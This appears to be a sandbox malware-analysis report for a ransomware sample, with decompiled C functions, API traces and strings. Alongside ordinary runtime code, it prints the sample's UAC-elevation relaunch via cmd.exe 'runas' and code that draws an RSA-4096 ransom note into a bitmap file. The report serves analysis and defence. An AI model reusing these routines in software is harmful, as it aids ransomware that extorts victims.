Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042A855, Relevance: 1.5, APIs: 1, Instructions: 3

APIs

EncodePointer.KERNEL32(00000000,0042D50B,00440828,00000314,00000000,?,?,?,?,?,00428B12,00440828,Microsoft Visual C++ Runtime Library,00012010), ref: 0042A857

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042591D, Relevance: 1.3, APIs: 1, Instructions: 58

C-Code - Quality: 100%

			E0042591D(void* __edx, void* __edi, void* __esi, long _a4) {
				intOrPtr* _t2;
				long _t7;
				void* _t8;
				void* _t12;
				long _t15;
				void* _t20;
				void* _t22;
				intOrPtr _t26;

				_t20 = __edx;
				_t15 = _a4;
				if(_t15 > 0xffffffe0) {
					E00428BCC(_t2, _t15);
					 *((intOrPtr*)(E00427125(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				while(1) {
					_t28 =  *0x440820;
					if( *0x440820 == 0) {
						E00428B84(_t20, _t28);
						E004289D5(_t20, 0x1e);
						E004266D0(0xff);
					}
					if(_t15 == 0) {
						_t7 = 1;
						__eflags = 1;
					} else {
						_t7 = _t15;
					}
					_t8 = HeapAlloc( *0x440820, 0, _t7); // executed
					_t22 = _t8;
					if(_t22 != 0) {
						break;
					}
					_t26 = 0xc;
					if( *0x440e54 == _t8) {
						 *((intOrPtr*)(E00427125(__eflags))) = _t26;
						L12:
						 *((intOrPtr*)(E00427125(_t32))) = _t26;
						break;
					}
					_t12 = E00428BCC(_t8, _t15);
					_t32 = _t12;
					if(_t12 != 0) {
						continue;
					}
					goto L12;
				}
				return _t22;
			}

0x0042591d
0x00425923
0x00425929
0x0042599b
0x004259a6
0x004259ac
0x00000000
0x004259ac
0x0042592d
0x0042592d
0x00425934
0x00425936
0x0042593d
0x00425947
0x0042594d
0x00425950
0x00425958
0x00425958
0x00425952
0x00425952
0x00425952
0x00425962
0x00425968
0x0042596c
0x00000000
0x00000000
0x00425970
0x00425977
0x0042598b
0x0042598d
0x00425992
0x00000000
0x00425992
0x0042597a
0x00425980
0x00425982
0x00000000
0x00000000
0x00000000
0x00425984
0x00000000

APIs

Part of subcall function 004289D5: GetModuleFileNameW.KERNEL32(00000000,0044085A,00000104,00000001,00000000,?), ref: 00428A71
Part of subcall function 004289D5: GetStdHandle.KERNEL32(000000F4,00000001,00000000,?), ref: 00428B23
Part of subcall function 004289D5: WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00428B6F

Part of subcall function 004266D0: ExitProcess.KERNEL32 ref: 004266E1

HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0042D12B,?,00000001,?,?,0042B986,00000018,0043C2A8,0000000C,0042BA16), ref: 00425962

Part of subcall function 00428BCC: DecodePointer.KERNEL32(?,0042E6AC,00000000,00000000,?,0042D175,?,00000000,00000000,00000000,00000000,?,0042A9B7,00000001,00000214), ref: 00428BD7

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042E650, Relevance: 1.3, APIs: 1, Instructions: 52

C-Code - Quality: 86%

			E0042E650(signed int _a4, signed int _a8, long _a12) {
				void* _t10;
				long _t11;
				long _t12;
				signed int _t13;
				signed int _t17;
				long _t19;
				long _t24;

				_t17 = _a4;
				if(_t17 == 0) {
					L3:
					_t24 = _t17 * _a8;
					__eflags = _t24;
					if(_t24 == 0) {
						_t24 = _t24 + 1;
						__eflags = _t24;
					}
					goto L5;
					L6:
					_t10 = HeapAlloc( *0x440820, 8, _t24); // executed
					__eflags = 0;
					if(0 == 0) {
						goto L7;
					}
					L14:
					return _t10;
					goto L15;
					L7:
					__eflags =  *0x440e54;
					if( *0x440e54 == 0) {
						_t19 = _a12;
						__eflags = _t19;
						if(_t19 != 0) {
							 *_t19 = 0xc;
						}
					} else {
						_t11 = E00428BCC(_t10, _t24);
						__eflags = _t11;
						if(_t11 != 0) {
							L5:
							_t10 = 0;
							__eflags = _t24 - 0xffffffe0;
							if(_t24 > 0xffffffe0) {
								goto L7;
							} else {
								goto L6;
							}
						} else {
							_t12 = _a12;
							__eflags = _t12;
							if(_t12 != 0) {
								 *_t12 = 0xc;
							}
							_t10 = 0;
						}
					}
					goto L14;
				} else {
					_t13 = 0xffffffe0;
					_t27 = _t13 / _t17 - _a8;
					if(_t13 / _t17 >= _a8) {
						goto L3;
					} else {
						 *((intOrPtr*)(E00427125(_t27))) = 0xc;
						return 0;
					}
				}
				L15:
			}

APIs

HeapAlloc.KERNEL32(00000008,00000000,00000000,?,0042D175,?,00000000,00000000,00000000,00000000,?,0042A9B7,00000001,00000214,?,004258DE), ref: 0042E693

Part of subcall function 00428BCC: DecodePointer.KERNEL32(?,0042E6AC,00000000,00000000,?,0042D175,?,00000000,00000000,00000000,00000000,?,0042A9B7,00000001,00000214), ref: 00428BD7

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042D15F, Relevance: 1.3, APIs: 1, Instructions: 30

C-Code - Quality: 100%

			E0042D15F(signed int _a4, signed int _a8) {
				void* _t4;
				long _t6;
				void* _t7;
				long _t8;
				void* _t9;
				void* _t12;
				void* _t13;

				_t8 = 0;
				while(1) {
					_t4 = E0042E650(_a4, _a8, 0); // executed
					_t7 = _t4;
					_t9 = _t9 + 0xc;
					if(_t7 != 0) {
						break;
					}
					_t12 =  *0x44121c - _t4; // 0x0
					if(_t12 > 0) {
						Sleep(_t8);
						_t3 = _t8 + 0x3e8; // 0x3e8
						_t6 = _t3;
						_t13 = _t6 -  *0x44121c; // 0x0
						if(_t13 > 0) {
							_t6 = _t6 | 0xffffffff;
						}
						_t8 = _t6;
						if(_t6 != 0xffffffff) {
							continue;
						}
					}
					break;
				}
				return _t7;
			}

APIs

Part of subcall function 0042E650: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,0042D175,?,00000000,00000000,00000000,00000000,?,0042A9B7,00000001,00000214,?,004258DE), ref: 0042E693

Sleep.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,000000FF), ref: 0042D187

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042D11A, Relevance: 1.3, APIs: 1, Instructions: 28

C-Code - Quality: 100%

			E0042D11A(intOrPtr _a4) {
				void* __edi;
				void* __esi;
				void* _t3;
				long _t5;
				void* _t7;
				void* _t8;
				long _t9;
				void* _t12;
				void* _t13;

				_t9 = 0;
				while(1) {
					_t3 = E0042591D(_t7, _t8, _t9, _a4); // executed
					_t8 = _t3;
					if(_t8 != 0) {
						break;
					}
					_t12 =  *0x44121c - _t3; // 0x0
					if(_t12 > 0) {
						Sleep(_t9);
						_t2 = _t9 + 0x3e8; // 0x3e8
						_t5 = _t2;
						_t13 = _t5 -  *0x44121c; // 0x0
						if(_t13 > 0) {
							_t5 = _t5 | 0xffffffff;
						}
						_t9 = _t5;
						if(_t5 != 0xffffffff) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x0042d121
0x0042d123
0x0042d126
0x0042d12b
0x0042d130
0x00000000
0x00000000
0x0042d132
0x0042d138
0x0042d13b
0x0042d141
0x0042d141
0x0042d147
0x0042d14d
0x0042d14f
0x0042d14f
0x0042d152
0x0042d157
0x00000000
0x00000000
0x0042d157
0x00000000
0x0042d138
0x0042d15e

APIs

Part of subcall function 0042591D: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0042D12B,?,00000001,?,?,0042B986,00000018,0043C2A8,0000000C,0042BA16), ref: 00425962

Sleep.KERNEL32(00000000,00000001,?,?,0042B986,00000018,0043C2A8,0000000C,0042BA16,?,?,?,0042A922,0000000D), ref: 0042D13B

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Non-executed Functions

Function 004256FE, Relevance: 7.6, APIs: 5, Instructions: 58

C-Code - Quality: 85%

			E004256FE(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x43f054; // 0xd6baf341
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x440600 = _t6;
				 *0x4405fc = _t22;
				 *0x4405f8 = _t25;
				 *0x4405f4 = _t21;
				 *0x4405f0 = _t27;
				 *0x4405ec = _t26;
				 *0x440618 = ss;
				 *0x44060c = cs;
				 *0x4405e8 = ds;
				 *0x4405e4 = es;
				 *0x4405e0 = fs;
				 *0x4405dc = gs;
				asm("pushfd");
				_pop( *0x440610);
				 *0x440604 =  *_t31;
				 *0x440608 = _v0;
				 *0x440614 =  &_a4;
				 *0x440550 = 0x10001;
				_t11 =  *0x440608; // 0x0
				 *0x440504 = _t11;
				 *0x4404f8 = 0xc0000409;
				 *0x4404fc = 1;
				_t12 =  *0x43f054; // 0xd6baf341
				_v812 = _t12;
				_t13 =  *0x43f058; // 0x29450cbe
				_v808 = _t13;
				 *0x440548 = IsDebuggerPresent();
				_push(1);
				E0042C6AF(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x431324);
				if( *0x440548 == 0) {
					_push(1);
					E0042C6AF(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

APIs

IsDebuggerPresent.KERNEL32 ref: 00426D9A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 00426F58, Relevance: 4.6, APIs: 3, Instructions: 75

C-Code - Quality: 75%

			E00426F58(intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				char _v800;
				signed int _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __ebx;
				void* __edi;
				signed int _t37;
				char* _t42;
				char _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				char* _t54;
				intOrPtr _t61;
				intOrPtr _t62;
				int _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				signed int _t67;
				signed int _t69;

				_t65 = __esi;
				_t61 = __edx;
				_t67 = _t69;
				_t37 =  *0x43f054; // 0xd6baf341
				_t38 = _t37 ^ _t67;
				_v8 = _t37 ^ _t67;
				_t51 = _a4;
				_push(_t62);
				if(_t51 != 0xffffffff) {
					E0042C6AF(_t38);
					_t53 = _t51;
				}
				_v804 = _v804 & 0x00000000;
				E0042D0A0( &_v800, 0, 0x4c);
				_v812.ExceptionRecord =  &_v804;
				_t42 =  &_v724;
				_v812.ContextRecord = _t42;
				_v548 = _t42;
				_v552 = _t53;
				_v556 = _t61;
				_v560 = _t51;
				_v564 = _t65;
				_v568 = _t62;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t43 = _v0;
				_t54 =  &_v0;
				_v528 = _t54;
				_v724 = 0x10001;
				_v540 = _t43;
				_v544 =  *((intOrPtr*)(_t54 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _t43;
				_t63 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				if(UnhandledExceptionFilter( &_v812) == 0 && _t63 == 0 && _t51 != 0xffffffff) {
					_push(_t51);
					_t47 = E0042C6AF(_t47);
				}
				_pop(_t64);
				_pop(_t52);
				return E004256FE(_t47, _t52, _v8 ^ _t67, _t61, _t64, _t65);
			}

APIs

IsDebuggerPresent.KERNEL32(?,00000001,?), ref: 00427042
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042704C
UnhandledExceptionFilter.KERNEL32(?), ref: 00427059

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 00170408, Relevance: 1.4, Strings: 1, Instructions: 145

Strings

.dll, xrefs: 0017055F

Memory Dump Source

Source File: 00000001.00000002.1396966249.00170000.00000040.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_170000_amhfnhe45.jbxd

Function 0042D4E5, Relevance: 38.6, APIs: 16, Strings: 6, Instructions: 134

APIs

Part of subcall function 0042A855: EncodePointer.KERNEL32(00000000,0042D50B,00440828,00000314,00000000,?,?,?,?,?,00428B12,00440828,Microsoft Visual C++ Runtime Library,00012010), ref: 0042A857

LoadLibraryW.KERNEL32(USER32.DLL), ref: 0042D520
GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0042D53C
EncodePointer.KERNEL32(00000000), ref: 0042D54D
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0042D55A
EncodePointer.KERNEL32(00000000), ref: 0042D55D
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0042D56A
EncodePointer.KERNEL32(00000000), ref: 0042D56D
GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0042D57A
EncodePointer.KERNEL32(00000000), ref: 0042D57D
GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0042D58E
EncodePointer.KERNEL32(00000000), ref: 0042D591
DecodePointer.KERNEL32(00000000,00440828,00000314,00000000), ref: 0042D5B3
DecodePointer.KERNEL32 ref: 0042D5BD
DecodePointer.KERNEL32(?,00440828,00000314,00000000), ref: 0042D5FC
DecodePointer.KERNEL32(?), ref: 0042D616
DecodePointer.KERNEL32(00440828,00000314,00000000), ref: 0042D62A

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

GetLastActivePopup, xrefs: 0042D55F
GetActiveWindow, xrefs: 0042D54F
GetUserObjectInformationW, xrefs: 0042D56F
GetProcessWindowStation, xrefs: 0042D588
USER32.DLL, xrefs: 0042D51B
MessageBoxW, xrefs: 0042D536

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041E880, Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 106

C-Code - Quality: 75%

			E0041E880() {
				signed int _v8;
				char _v528;
				short _v1048;
				char _v2088;
				struct _SHELLEXECUTEINFOW _v2148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				long _t31;
				void* _t46;
				void* _t59;
				void* _t61;
				signed int _t66;

				_t64 = _t66;
				_t24 =  *0x43f054; // 0xd6baf341
				_v8 = _t24 ^ _t66;
				E0042D0A0( &_v2088, 0, 0x410);
				E0042D0A0( &_v1048, 0, 0x208);
				_t56 =  &_v528;
				E0042D0A0( &_v528, 0, 0x208);
				_t31 = GetEnvironmentVariableW(L"windir",  &_v1048, 0x208);
				if(_t31 != 0 && _t31 <= 0x208) {
					_t56 =  &_v2088;
					if(E0041E810(0x410,  &_v2088, L"%s\\system32\\cmd.exe",  &_v1048) == 0) {
						_push(_t61);
						E0042623B( &_v528, 0x104, L"/c start \"\" \"");
						E00425ACD( &_v528, 0x104, "C:\Users\admin\AppData\Roaming\amhfnhe45.exe");
						E00425ACD( &_v528, 0x104, "\"");
						E0042D0A0( &_v2148, 0, 0x3c);
						_v2148.cbSize = 0x3c;
						_v2148.lpVerb = L"runas";
						_v2148.lpFile =  &_v2088;
						_v2148.lpParameters =  &_v528;
						_v2148.nShow = 0;
						_v2148.fMask = 0x40;
						if(ShellExecuteExW( &_v2148) == 0) {
							_push(_t46);
							_push(_t59);
							while(GetLastError() == 0x4c7) {
								Sleep(0x3e8);
								if(ShellExecuteExW( &_v2148) == 0) {
									continue;
								}
								break;
							}
							_pop(_t59);
							_pop(_t46);
						}
						_t56 = _v2148.hProcess;
						CloseHandle(_v2148.hProcess);
						_pop(_t61);
					}
				}
				return E004256FE(1, _t46, _v8 ^ _t64, _t56, _t59, _t61);
			}

APIs

GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041E8E2
ShellExecuteExW.SHELL32(?), ref: 0041E9C6
GetLastError.KERNEL32 ref: 0041E9E0
Sleep.KERNEL32(000003E8), ref: 0041E9EE
ShellExecuteExW.SHELL32(0000003C), ref: 0041E9F7
CloseHandle.KERNEL32(?), ref: 0041EA06

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Part of subcall function 0041E810: _vsnwprintf.NTDLL ref: 0041E841

Strings

C:\Users\admin\AppData\Roaming\amhfnhe45.exe, xrefs: 0041E93A
runas, xrefs: 0041E99C
@, xrefs: 0041E9BC
/c start "" ", xrefs: 0041E924
<, xrefs: 0041E992
%s\system32\cmd.exe, xrefs: 0041E908
windir, xrefs: 0041E8DD

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00420350, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 138

C-Code - Quality: 90%

			E00420350(WCHAR* _a4) {
				signed int _v12;
				intOrPtr _v18;
				intOrPtr _v22;
				intOrPtr _v26;
				void _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void _v60;
				void _v64;
				void _v68;
				long _v72;
				struct HBITMAP__* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				WCHAR* _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				int _t56;
				signed int _t59;
				int _t64;
				void* _t77;
				signed int _t81;
				long _t90;
				void* _t92;
				struct HDC__* _t93;
				signed int _t94;
				signed int _t100;

				_t51 =  *0x43f054; // 0xd6baf341
				_v12 = _t51 ^ _t94;
				_v96 = _a4;
				_v88 = 0;
				_v84 = 0;
				_v80 = 0;
				_t92 = 0;
				_v92 = 0;
				_t56 = E00420280( &_v92);
				_v76 = _t56;
				if(_t56 != 0) {
					_t59 = _v84 + _v84 * 2;
					_t81 = _t59 & 0x00000003;
					if(_t81 > 0) {
						_t86 = 4 - _t81;
						_t59 = _t59 + 4;
						_t100 = _t59;
					}
					_t90 = _v80 * _t59;
					_push(_t90);
					_t77 = E004256E8(_t90, _t92, _t100);
					if(_t77 != _t92) {
						_v68 = _t92;
						_v64 = 0;
						_v60 = 0;
						_v56 = 0;
						_v52 = 0;
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v26 = 0;
						_v22 = 0;
						_v18 = 0;
						_t93 = GetDC(_t92);
						_t64 = _v80;
						_v60 = _t64;
						_v68 = 0x28;
						_v56 = 0x180001;
						_v64 = _v84;
						GetDIBits(_t93, _v76, 0, _t64, _t77,  &_v68, 0);
						ReleaseDC(0, _t93);
						_t86 = 0x4d42;
						_v18 = 0x36;
						_v26 = _t90 + 0x36;
						_v28 = 0x4d42;
						_v72 = 0;
						_t92 = CreateFileW(_v96, 0xc0000000, 0, 0, 2, 0x80, 0);
						if(_t92 != 0xffffffff) {
							WriteFile(_t92,  &_v28, 0xe,  &_v72, 0);
							_v72 = 0;
							WriteFile(_t92,  &_v68, 0x28,  &_v72, 0);
							_t86 =  &_v72;
							_v72 = 0;
							WriteFile(_t92, _t77, _t90,  &_v72, 0);
						}
						FlushFileBuffers(_t92);
						CloseHandle(_t92);
						_push(_t77);
						E004264AD();
					}
					_t56 = DeleteObject(_v76);
				}
				return E004256FE(_t56, _t77, _v12 ^ _t94, _t86, _t90, _t92);
			}

APIs

Part of subcall function 00420280: GetDC.USER32(00000000), ref: 0042028F
Part of subcall function 00420280: CreateCompatibleBitmap.GDI32(00000000,0000047E,000003E8), ref: 004202C2
Part of subcall function 00420280: CreateCompatibleDC.GDI32(00000000), ref: 004202CF
Part of subcall function 00420280: SelectObject.GDI32(00000000,00000000), ref: 004202DD
Part of subcall function 00420280: SetBkMode.GDI32(00000000,00000001), ref: 004202E9
Part of subcall function 00420280: SetTextColor.GDI32(00000000,00FFFFFF), ref: 004202F5
Part of subcall function 00420280: SelectObject.GDI32(00000000,00000000), ref: 00420308
Part of subcall function 00420280: DeleteDC.GDI32(00000000), ref: 0042030F
Part of subcall function 00420280: ReleaseDC.USER32(00000000,00000000), ref: 00420322
Part of subcall function 00420280: DeleteObject.GDI32(00000000), ref: 00420333

GetDC.USER32(00000000), ref: 004203EB
GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 0042041C
ReleaseDC.USER32(00000000,00000000), ref: 00420425
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0042045E
WriteFile.KERNEL32(00000000,?,0000000E,00000000,00000000), ref: 00420478
WriteFile.KERNEL32(00000000,00000028,00000028,00000000,00000000), ref: 00420492
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004204A8
FlushFileBuffers.KERNEL32(00000000), ref: 004204AF
CloseHandle.KERNEL32(00000000), ref: 004204B6
DeleteObject.GDI32(?), ref: 004204C9

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

6, xrefs: 00420449
(, xrefs: 0042040B

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041FE90, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 45

C-Code - Quality: 100%

			E0041FE90(struct HDC__* __edi, struct tagRECT* __esi) {
				void* _t10;

				_t10 = CreateFontW(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 1, 0, 0, 0, 0x20, L"Tahoma");
				SelectObject(__edi, _t10);
				 *__esi = 0xa;
				__esi->top = 0xa;
				DrawTextA(__edi, " __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!  NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo", 0xffffffff, __esi, 0x400);
				DrawTextA(__edi, " __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!  NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo", 0xffffffff, __esi, 0x10);
				SelectObject(__edi, GetStockObject(0xd));
				DeleteObject(_t10);
				return __esi;
			}

0x0041febb
0x0041febf
0x0041fed3
0x0041fed9
0x0041fee0
0x0041fef1
0x0041ff01
0x0041ff08
0x0041ff11

APIs

CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041FEB5
SelectObject.GDI32(00000000,00000000), ref: 0041FEBF
DrawTextA.USER32(00000000, __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo,000000FF,?,00000400), ref: 0041FEE0
DrawTextA.USER32(00000000, __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo,000000FF,?,00000010), ref: 0041FEF1
GetStockObject.GDI32(0000000D), ref: 0041FEF9
SelectObject.GDI32(00000000,00000000), ref: 0041FF01
DeleteObject.GDI32(00000000), ref: 0041FF08

Strings

Tahoma, xrefs: 0041FE93
__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! NOT YOUR LANGUAGE? USE https://translate.google.com What happened to your files ?All of your files were protected by a strong encryption with RSA-4096.Mo, xrefs: 0041FECD, 0041FEEB

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 00420280, Relevance: 15.1, APIs: 10, Instructions: 79

C-Code - Quality: 100%

			E00420280(intOrPtr* __eax) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				void* __edi;
				void* __esi;
				void* _t32;
				struct HDC__* _t35;
				struct HDC__* _t36;
				intOrPtr* _t37;

				_t37 = __eax;
				_t35 = GetDC(0);
				 *_t37 = 0;
				 *((intOrPtr*)(_t37 + 4)) = 0;
				 *(_t37 + 8) = 0x47e;
				_v8 = _t35;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				 *(_t37 + 0xc) = 0x3e8;
				_t32 = CreateCompatibleBitmap(_t35, 0x47e, 0x3e8);
				if(_t32 != 0) {
					_t36 = CreateCompatibleDC(_t35);
					if(_t36 != 0) {
						_v12 = SelectObject(_t36, _t32);
						SetBkMode(_t36, 1);
						SetTextColor(_t36, 0xffffff);
						E0041FE90(_t36,  &_v28);
						SelectObject(_t36, _v12);
						DeleteDC(_t36);
						_v12 = 1;
					}
					_t35 = _v8;
				}
				ReleaseDC(0, _t35);
				if(_v12 != 0 || _t32 == 0) {
					return _t32;
				} else {
					DeleteObject(_t32);
					return 0;
				}
			}

APIs

GetDC.USER32(00000000), ref: 0042028F
CreateCompatibleBitmap.GDI32(00000000,0000047E,000003E8), ref: 004202C2
CreateCompatibleDC.GDI32(00000000), ref: 004202CF
SelectObject.GDI32(00000000,00000000), ref: 004202DD
SetBkMode.GDI32(00000000,00000001), ref: 004202E9
SetTextColor.GDI32(00000000,00FFFFFF), ref: 004202F5

Part of subcall function 0041FE90: CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041FEB5
Part of subcall function 0041FE90: SelectObject.GDI32(00000000,00000000), ref: 0041FEBF
